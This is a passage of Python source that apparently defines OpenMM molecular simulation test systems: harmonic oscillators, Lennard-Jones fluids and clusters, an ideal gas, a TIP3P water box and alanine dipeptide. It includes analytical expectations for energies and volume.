"""Create a pair of particles in 3D harmonic oscillator wells, coupled by a constraint.
Parameters
----------
K : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole / units.nanometer**2
harmonic restraining potential
d : simtk.unit.Quantity, optional, default=1.0 * units.nanometer
distance between harmonic oscillators. Default is Amber GAFF c-c bond.
mass : simtk.unit.Quantity, default=39.948 * units.amu
particle mass
Attributes
----------
system : simtk.openmm.System
positions : list
Notes
-----
The natural period of a harmonic oscillator is T = sqrt(m/K), so you will want to use an
integration timestep smaller than ~ T/10.
Examples
--------
Create a constraint-coupled harmonic oscillator with specified mass, distance, and spring constant.
>>> ccho = ConstraintCoupledHarmonicOscillator()
>>> mass = 12.0 * units.amu
>>> d = 5.0 * units.angstroms
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ccho = ConstraintCoupledHarmonicOscillator(K=K, d=d, mass=mass)
>>> system, positions = ccho.system, ccho.positions
"""
def __init__(self,
K=1.0 * units.kilojoules_per_mole/units.nanometer**2,
d=1.0 * units.nanometer,
mass=39.948 * units.amu):
# Create an empty system object.
system = mm.System()
# Add particles to the system.
system.addParticle(mass)
system.addParticle(mass)
# Set the positions.
positions = units.Quantity(np.zeros([2,3], np.float32), units.angstroms)
positions[1,0] = d
# Add a restrining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * ((x-d)^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addPerParticleParameter('d')
force.addParticle(0, [0.0])
force.addParticle(1, [d / units.nanometers])
system.addForce(force)
# Add constraint between particles.
system.addConstraint(0, 1, d)
# Add a harmonic bond force as well so minimization will roughly satisfy constraints.
force = mm.HarmonicBondForce()
K = 10.0 * units.kilocalories_per_mole / units.angstrom**2 # force constant
force.addBond(0, 1, d, K)
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.d, self.mass = K, d, mass
#=============================================================================================
# Harmonic oscillator array
#=============================================================================================
class HarmonicOscillatorArray(TestSystem):
"""Create a 1D array of noninteracting particles in 3D harmonic oscillator wells.
Parameters
----------
K : simtk.unit.Quantity, optional, default=90.0 * units.kilocalories_per_mole/units.angstroms**2
harmonic restraining potential
d : simtk.unit.Quantity, optional, default=1.0 * units.nanometer
distance between harmonic oscillators. Default is Amber GAFF c-c bond.
mass : simtk.unit.Quantity, default=39.948 * units.amu
particle mass
N : int, optional, default=5
Number of harmonic oscillators
Attributes
----------
system : simtk.openmm.System
positions : list
Notes
-----
The natural period of a harmonic oscillator is T = sqrt(m/K), so you will want to use an
integration timestep smaller than ~ T/10.
Examples
--------
Create a constraint-coupled 3D harmonic oscillator with default parameters.
>>> ho_array = HarmonicOscillatorArray()
>>> mass = 12.0 * units.amu
>>> d = 5.0 * units.angstroms
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ccho = HarmonicOscillatorArray(K=K, d=d, mass=mass)
>>> system, positions = ccho.system, ccho.positions
"""
def __init__(self, K=90.0 * units.kilocalories_per_mole/units.angstroms**2,
d=1.0 * units.nanometer,
mass=39.948 * units.amu ,
N=5):
# Create an empty system object.
system = mm.System()
# Add particles to the system.
for n in range(N):
system.addParticle(mass)
# Set the positions for a 1D array of particles spaced d apart along the x-axis.
positions = units.Quantity(np.zeros([N,3], np.float32), units.angstroms)
for n in range(N):
positions[n,0] = n*d
# Add a restrining potential for each oscillator.
force = mm.CustomExternalForce('(K/2.0) * ((x-x0)^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addPerParticleParameter('x0')
for n in range(N):
parameters = (d*n / units.nanometers, )
force.addParticle(n, parameters)
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.d, self.mass, self.N = K, d, mass, N
self.ndof = 3*N
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (self.ndof/2.) * kB * state.temperature
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
return (self.ndof/2.) * kB * state.temperature
#=============================================================================================
# Sodium chloride FCC crystal.
#=============================================================================================
class SodiumChlorideCrystal(TestSystem):
"""Create an FCC crystal of sodium chloride.
Each atom is represented by a charged Lennard-Jones sphere in an Ewald lattice.
Notes
-----
TODO
* Lennard-Jones interactions aren't correctly being included now, due to LJ cutoff. Fix this by hard-coding LJ interactions?
* Add nx, ny, nz arguments to allow user to specify replication of crystal unit in x,y,z.
* Choose more appropriate lattice parameters and lattice spacing.
Examples
--------
Create sodium chloride crystal unit.
>>> crystal = SodiumChlorideCrystal()
>>> system, positions = crystal.system, crystal.positions
"""
def __init__(self):
# Set default parameters (from Tinker).
mass_Na = 22.990 * units.amu
mass_Cl = 35.453 * units.amu
q_Na = 1.0 * units.elementary_charge
q_Cl =-1.0 * units.elementary_charge
sigma_Na = 3.330445 * units.angstrom
sigma_Cl = 4.41724 * units.angstrom
epsilon_Na = 0.002772 * units.kilocalorie_per_mole
epsilon_Cl = 0.118 * units.kilocalorie_per_mole
# Create system
system = mm.System()
# Set box vectors.
box_size = 5.628 * units.angstroms # box width
a = units.Quantity(np.zeros([3]), units.nanometers); a[0] = box_size
b = units.Quantity(np.zeros([3]), units.nanometers); b[1] = box_size
c = units.Quantity(np.zeros([3]), units.nanometers); c[2] = box_size
system.setDefaultPeriodicBoxVectors(a, b, c)
# Create nonbonded force term.
force = mm.NonbondedForce()
# Set interactions to be periodic Ewald.
force.setNonbondedMethod(mm.NonbondedForce.Ewald)
# Set cutoff to be less than one half the box length.
cutoff = box_size / 2.0 * 0.99
force.setCutoffDistance(cutoff)
# Allocate storage for positions.
natoms = 2
positions = units.Quantity(np.zeros([natoms,3], np.float32), units.angstroms)
# Add sodium ion.
system.addParticle(mass_Na)
force.addParticle(q_Na, sigma_Na, epsilon_Na)
positions[0,0] = 0.0 * units.angstrom
positions[0,1] = 0.0 * units.angstrom
positions[0,2] = 0.0 * units.angstrom
# Add chloride atom.
system.addParticle(mass_Cl)
force.addParticle(q_Cl, sigma_Cl, epsilon_Cl)
positions[1,0] = 2.814 * units.angstrom
positions[1,1] = 2.814 * units.angstrom
positions[1,2] = 2.814 * units.angstrom
# Add nonbonded force term to the system.
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Lennard-Jones cluster
#=============================================================================================
class LennardJonesCluster(TestSystem):
"""Create a non-periodic rectilinear grid of Lennard-Jones particles in a harmonic restraining potential.
Parameters
----------
nx : int, optional, default=3
number of particles in the x direction
ny : int, optional, default=3
number of particles in the y direction
nz : int, optional, default=3
number of particles in the z direction
K : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole/units.nanometer**2
harmonic restraining potential
Examples
--------
Create Lennard-Jones cluster.
>>> cluster = LennardJonesCluster()
>>> system, positions = cluster.system, cluster.positions
Create default 3x3x3 Lennard-Jones cluster in a harmonic restraining potential.
>>> cluster = LennardJonesCluster(nx=10, ny=10, nz=10)
>>> system, positions = cluster.system, cluster.positions
"""
def __init__(self, nx=3, ny=3, nz=3, K=1.0 * units.kilojoules_per_mole/units.nanometer**2):
# Default parameters
mass_Ar = 39.9 * units.amu
q_Ar = 0.0 * units.elementary_charge
sigma_Ar = 3.350 * units.angstrom
epsilon_Ar = 0.001603 * units.kilojoule_per_mole
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Create a NonbondedForce object with no cutoff.
nb = mm.NonbondedForce()
nb.setNonbondedMethod(mm.NonbondedForce.NoCutoff)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass_Ar)
nb.addParticle(q_Ar, sigma_Ar, epsilon_Ar)
x = sigma_Ar*scaleStepSizeX*(ii - nx/2.0)
y = sigma_Ar*scaleStepSizeY*(jj - ny/2.0)
z = sigma_Ar*scaleStepSizeZ*(kk - nz/2.0)
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
# Add the nonbonded force.
system.addForce(nb)
# Add a restrining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * (x^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
for particle_index in range(natoms):
force.addParticle(particle_index, [])
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Lennard-Jones fluid
#=============================================================================================
class LennardJonesFluid(TestSystem):
"""Create a periodic rectilinear grid of Lennard-Jones particles.
Parameters for argon are used by default. Cutoff is set to 3 sigma by default.
Parameters
----------
nx : int, optional, default=6
number of particles in the x direction
ny : int, optional, default=6
number of particles in the y direction
nz : int, optional, default=6
number of particles in the z direction
mass : simtk.unit.Quantity, optional, default=39.9 * units.amu
mass of each particle.
sigma : simtk.unit.Quantity, optional, default=3.4 * units.angstrom
Lennard-Jones sigma parameter
epsilon : simtk.unit.Quantity, optional, default=0.238 * units.kilocalories_per_mole
Lennard-Jones well depth
cutoff : simtk.unit.Quantity, optional, default=None
Cutoff for nonbonded interactions. If None, defaults to 2.5 * sigma
switch : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole/units.nanometer**2
if specified, the switching function will be turned on at this distance (default: None)
dispersion_correction : bool, optional, default=True
if True, will use analytical dispersion correction (if not using switching function)
Examples
--------
Create default-size Lennard-Jones fluid.
>>> fluid = LennardJonesFluid()
>>> system, positions = fluid.system, fluid.positions
Create a larger 10x8x5 box of Lennard-Jones particles.
>>> fluid = LennardJonesFluid(nx=10, ny=8, nz=5)
>>> system, positions = fluid.system, fluid.positions
Create Lennard-Jones fluid using switched particle interactions (switched off betwee 7 and 9 A) and more particles.
>>> fluid = LennardJonesFluid(nx=10, ny=10, nz=10, switch=7.0*units.angstroms, cutoff=9.0*units.angstroms)
>>> system, positions = fluid.system, fluid.positions
"""
def __init__(self, nx=6, ny=6, nz=6,
mass=39.9 * units.amu, # argon
sigma=3.4 * units.angstrom, # argon,
epsilon=0.238 * units.kilocalories_per_mole, # argon,
cutoff=None,
switch=False,
dispersion_correction=True):
if cutoff is None:
cutoff = 2.5 * sigma
charge = 0.0 * units.elementary_charge
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Set up periodic nonbonded interactions with a cutoff.
if switch:
energy_expression = "LJ * S;"
energy_expression += "LJ = 4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
#energy_expression += "sigma = 0.5 * (sigma1 + sigma2);"
#energy_expression += "epsilon = sqrt(epsilon1*epsilon2);"
energy_expression += "S = (cutoff^2 - r^2)^2 * (cutoff^2 + 2*r^2 - 3*switch^2) / (cutoff^2 - switch^2)^3;"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('switch', switch)
nb.addGlobalParameter('cutoff', cutoff)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
else:
nb = mm.NonbondedForce()
nb.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
nb.setUseDispersionCorrection(dispersion_correction)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
maxX = 0.0 * units.angstrom
maxY = 0.0 * units.angstrom
maxZ = 0.0 * units.angstrom
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass)
if switch:
nb.addParticle([])
else:
nb.addParticle(charge, sigma, epsilon)
x = sigma*scaleStepSizeX*ii
y = sigma*scaleStepSizeY*jj
z = sigma*scaleStepSizeZ*kk
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
# Wrap positions as needed.
if x>maxX: maxX = x
if y>maxY: maxY = y
if z>maxZ: maxZ = z
# Set periodic box vectors.
x = maxX+2*sigma*scaleStepSizeX
y = maxY+2*sigma*scaleStepSizeY
z = maxZ+2*sigma*scaleStepSizeZ
a = units.Quantity((x, 0*units.angstrom, 0*units.angstrom))
b = units.Quantity((0*units.angstrom, y, 0*units.angstrom))
c = units.Quantity((0*units.angstrom, 0*units.angstrom, z))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add the nonbonded force.
system.addForce(nb)
self.system, self.positions = system, positions
#=============================================================================================
# Custom Lennard-Jones fluid
#=============================================================================================
class CustomLennardJonesFluid(TestSystem):
"""Create a periodic rectilinear grid of Lennard-Jones particled, but implemented via CustomBondForce rather than NonbondedForce.
Parameters for argon are used by default. Cutoff is set to 3 sigma by default.
Parameters
----------
nx : int, optional, default=6
number of particles in the x direction
ny : int, optional, default=6
number of particles in the y direction
nz : int, optional, default=6
number of particles in the z direction
mass : simtk.unit.Quantity, optional, default=39.9 * units.amu
mass of each particle.
sigma : simtk.unit.Quantity, optional, default=3.4 * units.angstrom
Lennard-Jones sigma parameter
epsilon : simtk.unit.Quantity, optional, default=0.238 * units.kilocalories_per_mole
Lennard-Jones well depth
cutoff : simtk.unit.Quantity, optional, default=None
Cutoff for nonbonded interactions. If None, defaults to 2.5 * sigma
switch : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole/units.nanometer**2
if specified, the switching function will be turned on at this distance (default: None)
dispersion_correction : bool, optional, default=True
if True, will use analytical dispersion correction (if not using switching function)
Notes
-----
No analytical dispersion correction is included here.
Examples
--------
Create default-size Lennard-Jones fluid.
>>> fluid = CustomLennardJonesFluid()
>>> system, positions = fluid.system, fluid.positions
Create a larger 10x8x5 box of Lennard-Jones particles.
>>> fluid = CustomLennardJonesFluid(nx=10, ny=8, nz=5)
>>> system, positions = fluid.system, fluid.positions
Create Lennard-Jones fluid using switched particle interactions (switched off betwee 7 and 9 A) and more particles.
>>> fluid = CustomLennardJonesFluid(nx=10, ny=10, nz=10, switch=7.0*units.angstroms, cutoff=9.0*units.angstroms)
>>> system, positions = fluid.system, fluid.positions
"""
def __init__(self, nx=6, ny=6, nz=6,
mass=39.9 * units.amu, # argon
sigma=3.4 * units.angstrom, # argon,
epsilon=0.238 * units.kilocalories_per_mole, # argon,
cutoff=None,
switch=False,
dispersion_correction=True):
if cutoff is None:
cutoff = 2.5 * sigma
charge = 0.0 * units.elementary_charge
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Set up periodic nonbonded interactions with a cutoff.
if switch:
energy_expression = "LJ * S;"
energy_expression += "LJ = 4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
energy_expression += "S = (cutoff^2 - r^2)^2 * (cutoff^2 + 2*r^2 - 3*switch^2) / (cutoff^2 - switch^2)^3;"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('switch', switch)
nb.addGlobalParameter('cutoff', cutoff)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
else:
energy_expression = "4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
maxX = 0.0 * units.angstrom
maxY = 0.0 * units.angstrom
maxZ = 0.0 * units.angstrom
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass)
nb.addParticle([])
x = sigma*scaleStepSizeX*ii
y = sigma*scaleStepSizeY*jj
z = sigma*scaleStepSizeZ*kk
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
# Wrap positions as needed.
if x>maxX: maxX = x
if y>maxY: maxY = y
if z>maxZ: maxZ = z
# Set periodic box vectors.
x = maxX+2*sigma*scaleStepSizeX
y = maxY+2*sigma*scaleStepSizeY
z = maxZ+2*sigma*scaleStepSizeZ
a = units.Quantity((x, 0*units.angstrom, 0*units.angstrom))
b = units.Quantity((0*units.angstrom, y, 0*units.angstrom))
c = units.Quantity((0*units.angstrom, 0*units.angstrom, z))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add the nonbonded force.
system.addForce(nb)
# Add long-range correction.
if switch:
# TODO
pass
else:
volume = x*y*z
density = natoms / volume
per_particle_dispersion_energy = -(8./3.)*math.pi*epsilon*(sigma**6)/(cutoff**3)*density # attraction
per_particle_dispersion_energy += (8./9.)*math.pi*epsilon*(sigma**12)/(cutoff**9)*density # repulsion
energy_expression = "%f" % (per_particle_dispersion_energy / units.kilojoules_per_mole)
force = mm.CustomExternalForce(energy_expression)
for i in range(natoms):
force.addParticle(i, [])
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Ideal gas
#=============================================================================================
class IdealGas(TestSystem):
"""Create an 'ideal gas' of noninteracting particles in a periodic box.
Parameters
----------
nparticles : int, optional, default=216
number of particles
mass : int, optional, default=39.9 * units.amu
temperature : int, optional, default=298.0 * units.kelvin
pressure : int, optional, default=1.0 * units.atmosphere
volume : None
if None, defaults to (nparticles * temperature * units.BOLTZMANN_CONSTANT_kB / pressure).in_units_of(units.nanometers**3)
Examples
--------
Create an ideal gas system.
>>> gas = IdealGas()
>>> system, positions = gas.system, gas.positions
Create a smaller ideal gas system containing 64 particles.
>>> gas = IdealGas(nparticles=64)
>>> system, positions = gas.system, gas.positions
"""
def __init__(self, nparticles=216, mass=39.9 * units.amu, temperature=298.0 * units.kelvin, pressure=1.0 * units.atmosphere, volume=None):
if volume is None:
volume = (nparticles * temperature * units.BOLTZMANN_CONSTANT_kB / pressure).in_units_of(units.nanometers**3)
charge = 0.0 * units.elementary_charge
sigma = 3.350 * units.angstrom # argon LJ
epsilon = 0.0 * units.kilojoule_per_mole # zero interaction
# Create an empty system object.
system = mm.System()
# Compute box size.
length = volume**(1.0/3.0)
a = units.Quantity((length, 0*units.nanometer, 0*units.nanometer))
b = units.Quantity((0*units.nanometer, length, 0*units.nanometer))
c = units.Quantity((0*units.nanometer, 0*units.nanometer, length))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add particles.
for index in range(nparticles):
system.addParticle(mass)
# Place particles at random positions within the box.
# TODO: Use reproducible seed.
# NOTE: This may not be thread-safe.
state = np.random.get_state()
np.random.seed(0)
positions = units.Quantity((length/units.nanometer) * np.random.rand(nparticles,3), units.nanometer)
np.random.set_state(state)
self.system, self.positions = system, positions
self.ndof = 3 * nparticles
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return 0.0 * units.kilojoules_per_mole
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
return 0.0 * units.kilojoules_per_mole
def get_kinetic_expectation(self, state):
"""Return the expectation of the kinetic energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (3./2.) * kB * state.temperature
def get_kinetic_standard_deviation(self, state):
"""Return the standard deviation of the kinetic energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
return (3./2.) * kB * state.temperature
def get_volume_expectation(self, state):
"""Return the expectation of the volume, computed analytically.
Arguments
---------
state : ThermodynamicState with temperature and pressure defined
The thermodynamic state at which the property is to be computed.
Returns
-------
volume_mean : simtk.unit.Quantity compatible with simtk.unit.nanometers**3
The expectation of the volume at equilibrium.
Notes
-----
The true mean volume is used, rather than the large-N limit.
"""
if not state.pressure:
box_vectors = self.system.getDefaultPeriodicBoxVectors()
volume = box_vectors[0][0] * box_vectors[1][1] * box_vectors[2][2]
return volume
N = self._system.getNumParticles()
return ((N+1) * units.BOLTZMANN_CONSTANT_kB * state.temperature / state.pressure).in_units_of(units.nanometers**3)
def get_volume_standard_deviation(self, state):
"""Return the standard deviation of the volume, computed analytically.
Arguments
---------
state : ThermodynamicState with temperature and pressure defined
The thermodynamic state at which the property is to be computed.
Returns
-------
volume_stddev : simtk.unit.Quantity compatible with simtk.unit.nanometers**3
The standard deviation of the volume at equilibrium.
Notes
-----
The true mean volume is used, rather than the large-N limit.
"""
if not state.pressure:
return 0.0 * units.nanometers**3
N = self._system.getNumParticles()
return (numpy.sqrt(N+1) * units.BOLTZMANN_CONSTANT_kB * state.temperature / state.pressure).in_units_of(units.nanometers**3)
#=============================================================================================
# Water box
#=============================================================================================
class WaterBox(TestSystem):
"""Create a test system containing a periodic box of TIP3P water.
Flexible bonds and angles are always added, and constraints are optional (but on by default).
Addition of flexible bond and angle terms doesn't affect constrained dynamics, but allows for minimization to work properly.
Parameters
----------
constrain : bool, optional, default=True
if True, will also constrain OH and HH bonds in water (default: True)
flexible : bool, optional, default=True,
if True, will add harmonic OH bonds and HOH angle between
cutoff : Quantity, optional, default=None,
If None, defaults to box_size / 2.0 * 0.999
nonbonded_method : default=None
filename : str, optional, default="watbox216.pdb"
name of file containing water positions
charges : bool, optional, default=True
Examples
--------
Create a 216-water system.
>>> water_box = WaterBox()
>>> (system, positions) = water_box.system, water_box.positions
TODO
----
* Allow size of box (either dimensions or number of waters) to be specified, replicating equilibrated waterbox to fill these dimensions.
"""
def __init__(self, constrain=True, flexible=True, cutoff=None, nonbonded_method=None, filename=None, charges=True):
# Construct filename
if filename is None:
filename = os.path.join(os.path.dirname(__file__), 'data', 'waterbox', 'watbox216.pdb')
# Partial atomic charges for water
massO = 16.0 * units.amu
massH = 1.0 * units.amu
# Partial atomic charges for TIP3P water
if charges:
qO = -0.8340 * units.elementary_charge
qH = 0.4170 * units.elementary_charge
else:
qO = 0.0 * units.elementary_charge
qH = 0.0 * units.elementary_charge
# Lennard-Jones parameters for oxygen-oxygen interactions
sigma = 3.15061 * units.angstrom
epsilon = 0.6364 * units.kilojoule_per_mole
# Water bond and angle values
rOH = 0.9572 * units.angstrom
aHOH = 104.52 * units.degree
# Water bond and angle spring constants.
kOH = 553.0 * units.kilocalories_per_mole / units.angstrom**2 # from AMBER parm96
kHOH = 100.0 * units.kilocalories_per_mole / units.radian**2 # from AMBER parm96
# Distance between the two H atoms in water
rHH = 2*rOH*units.sin(aHOH/2.0)
def loadCoordsHOH(infile):
"""
Load water positions from a PDB file.
"""
pdbData = []
atomNum = 0
resNum = 0
for line in infile:
if line.find('HETATM')==0 or line.find('ATOM ')==0:
resName=line[17:20]
if resName in ['HOH', 'WAT', 'SOL']:
atomNum+=1
atomName=line[12:16].strip()
if atomName in ['O', 'OW']:
resNum+=1
try:
if atomName==pdbData[-1][1] or atomName==pdbData[-2][1]:
raise Exception("bad water molecule near %s..." % line[:27])
except IndexError:
pass
x = float(line[30:38])
y = float(line[38:46])
z = float(line[46:54])
pdbData.append( (atomNum, atomName, resName, resNum, ((x, y, z) * units.angstrom) ) )
return pdbData
# Load waters from input pdb file
infile = open(filename, 'r')
pdbData = loadCoordsHOH(infile)
infile.close()
# Determine number of atoms.
natoms = len(pdbData)
# Create water system, which will inlcude force field
# and general system parameters
system = mm.System()
# Create nonbonded, harmonic bond, and harmonic angle forces.
nb = mm.NonbondedForce()
bond = mm.HarmonicBondForce()
angle = mm.HarmonicAngleForce()
# Add water molecules to system
# Note that no bond forces are used. Bond lenths are rigid
count = 0
positions = units.Quantity(np.zeros([natoms,3], np.float32), units.nanometer)
for atomNum, atomName, resName, resNum, xyz in pdbData:
if atomName in ['O', 'OW']:
# Add an oxygen atom
system.addParticle(massO)
nb.addParticle(qO, sigma, epsilon)
lastOxygen = count
elif atomName in ['H1', 'H2', 'HW1', 'HW2']:
# Add an hydrogen atom
system.addParticle(massH)
zero_chargeprod = 0.0 * units.elementary_charge**2
unit_sigma = 1.0 * units.angstroms
zero_epsilon = 0.0 * units.kilocalories_per_mole
nb.addParticle(qH, unit_sigma, zero_epsilon)
if (count == lastOxygen+1):
# For the last oxygen and hydrogen number 1:
if constrain: system.addConstraint(lastOxygen, count, rOH) #O-H1
# Add harmonic bond force for this bond.
bond.addBond(lastOxygen, count, rOH, kOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(lastOxygen, count, zero_chargeprod, unit_sigma, zero_epsilon) #O-H1
elif (count == lastOxygen+2):
# For the last oxygen and hydrogen number 2:
if constrain: system.addConstraint(lastOxygen, count, rOH) #O-H2
# Add harmonic bond force for this bond.
bond.addBond(lastOxygen, count, rOH, kOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(lastOxygen, count, zero_chargeprod, unit_sigma, zero_epsilon) #O-H2
# For hydrogen number 1 and hydrogen number 2
if constrain: system.addConstraint(count-1, count, rHH) #H1-H2
# Add harmonic angle bend.
angle.addAngle(count-1, lastOxygen, count, aHOH, kHOH)
# Exception: chargeProd=0.0, sigma=1.0, epsilon=0.0
nb.addException(count-1, count, zero_chargeprod, unit_sigma, zero_epsilon) #H1-H2
else:
s = "too many hydrogens:"
s += " atomNum=%d, resNum=%d, resName=%s, atomName=%s" % (atomNum, resNum, resName, atomName)
raise Exception(s)
else:
raise Exception("bad atom : %s" % atomName)
for k in range(3):
positions[count,k] = xyz[k]
count += 1
# Determine box size from maximum extent.
box_extents = units.Quantity(np.zeros([3]), units.nanometers)
for k in range(3):
box_extents[k] = (positions[:,k] / units.nanometers).max() * units.nanometers - (positions[:,k] / units.nanometers).min() * units.nanometers
box_size = (box_extents / units.nanometers).max() * units.nanometers
# Set box vectors.
a = units.Quantity(np.zeros([3]), units.nanometers); a[0] = box_size
b = units.Quantity(np.zeros([3]), units.nanometers); b[1] = box_size
c = units.Quantity(np.zeros([3]), units.nanometers); c[2] = box_size
system.setDefaultPeriodicBoxVectors(a, b, c)
# Set nonbonded cutoff.
nb.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
if (nonbonded_method is not None):
nb.setNonbondedMethod(nonbonded_method)
if (cutoff is None) or (cutoff >= box_size / 2.0):
cutoff = box_size / 2.0 * 0.999 # cutoff should be smaller than half the box length
nb.setCutoffDistance(cutoff)
# Add force terms to system.
system.addForce(nb)
if flexible:
system.addForce(bond)
system.addForce(angle)
self.system, self.positions = system, positions
#=============================================================================================
# Alanine dipeptide in implicit solvent.
#=============================================================================================
class AlanineDipeptideImplicit(TestSystem):
"""Alanine dipeptide ff96 in OBC GBSA implicit solvent.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
Examples
--------
>>> alanine = AlanineDipeptideImplicit()
>>> (system, positions) = alanine.system, alanine.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-gbsa', 'alanine-dipeptide.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-gbsa', 'alanine-dipeptide.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(implicitSolvent=app.OBC1, constraints=app.HBonds, nonbondedCutoff=None)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename)
positions = inpcrd.getPositions(asNumpy=True)
self.system, self.positions = system, positions
#=============================================================================================
# Alanine dipeptide in explicit solvent
#=============================================================================================
class AlanineDipeptideExplicit(TestSystem):
"""Alanine dipeptide ff96 in TIP3P explicit solvent with PME electrostatics.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
nonbondedCutoff : Quantity, optional, default=9.0 * units.angstroms
use_dispersion_correction : bool, optional, default=True
If True, the long-range disperson correction will be used.
Examples
--------
>>> alanine = AlanineDipeptideExplicit()
>>> (system, positions) = alanine.system, alanine.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds', nonbondedCutoff=9.0 * units.angstroms, use_dispersion_correction=True):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-explicit', 'alanine-dipeptide.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'alanine-dipeptide-explicit', 'alanine-dipeptide.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
